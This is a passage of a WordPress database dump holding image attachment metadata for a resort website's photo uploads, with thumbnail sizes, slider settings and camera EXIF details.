2974-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2974-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2974-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2974-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2974-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2974-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2974-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2974-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1438839057\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0108695652174\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(452,182,'_wp_attached_file','2016/03/DSCN3007.jpg'),(453,182,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3007.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3007-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3007-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3007-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3007-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3007-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3007-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3007-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3007-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3007-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3007-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3007-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3007-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1440803335\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00283929585463\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(454,185,'_wp_attached_file','2016/03/DSCN2428.jpg'),(455,185,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2428.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2428-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2428-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2428-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2428-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2428-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2428-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2428-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2428-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2428-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2428-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2428-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2428-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1429299300\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"144\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00338868180278\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(456,186,'_wp_attached_file','2016/03/DSCN2438.jpg'),(457,186,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2438.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2438-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2438-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2438-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2438-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2438-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2438-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2438-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2438-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2438-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2438-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2438-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2438-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1429901793\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"144\";s:3:\"iso\";s:3:\"197\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(458,187,'_wp_attached_file','2016/03/DSCN3134.jpg'),(459,187,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3134.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3134-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3134-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3134-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3134-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3134-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3134-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3134-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3134-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3134-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3134-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3134-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3134-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1446324584\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"240\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00379218809253\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(460,188,'_wp_attached_file','2016/03/DSCN3161.jpg'),(461,188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3161.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3161-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3161-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3161-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3161-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3161-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3161-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3161-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3161-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3161-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3161-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3161-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3161-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1447359195\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"144\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00879507475814\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(462,189,'_wp_attached_file','2016/03/DSCN3219.jpg'),(463,189,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3219.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3219-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3219-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3219-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3219-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3219-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3219-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3219-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3219-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3219-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3219-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3219-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3219-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1447965128\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"233\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(464,170,'ml-slider_type','image'),(465,170,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2016/03/DSCN3611-700x300.jpg\";s:4:\"file\";s:20:\"DSCN3611-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(466,204,'_wp_attached_file','2016/06/DSCN2502.jpg'),(467,204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/06/DSCN2502.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2502-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2502-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2502-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2502-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2502-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2502-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2502-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2502-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2502-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2502-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2502-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2502-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431904974\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00507099391481\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(468,204,'ml-slider_type','image'),(469,204,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2016/06/DSCN2502-700x300.jpg\";s:4:\"file\";s:20:\"DSCN2502-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(470,170,'ml-slider_crop_position','center-center'),(471,170,'_wp_attachment_image_alt',''),(472,204,'ml-slider_crop_position','center-center'),(473,204,'_wp_attachment_image_alt',''),(474,1,'_edit_lock','1467333139:1'),(475,207,'_wp_attached_file','2016/06/water3Header.jpg'),(476,207,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2000;s:6:\"height\";i:314;s:4:\"file\";s:24:\"2016/06/water3Header.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"water3Header-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"water3Header-300x47.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:47;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"water3Header-768x121.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:121;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"water3Header-1024x161.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:24:\"water3Header-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:24:\"water3Header-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"water3Header-720x314.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:314;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:25:\"water3Header-1080x314.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:314;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:24:\"water3Header-960x314.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:314;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:24:\"water3Header-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:24:\"water3Header-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:24:\"water3Header-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(477,11,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i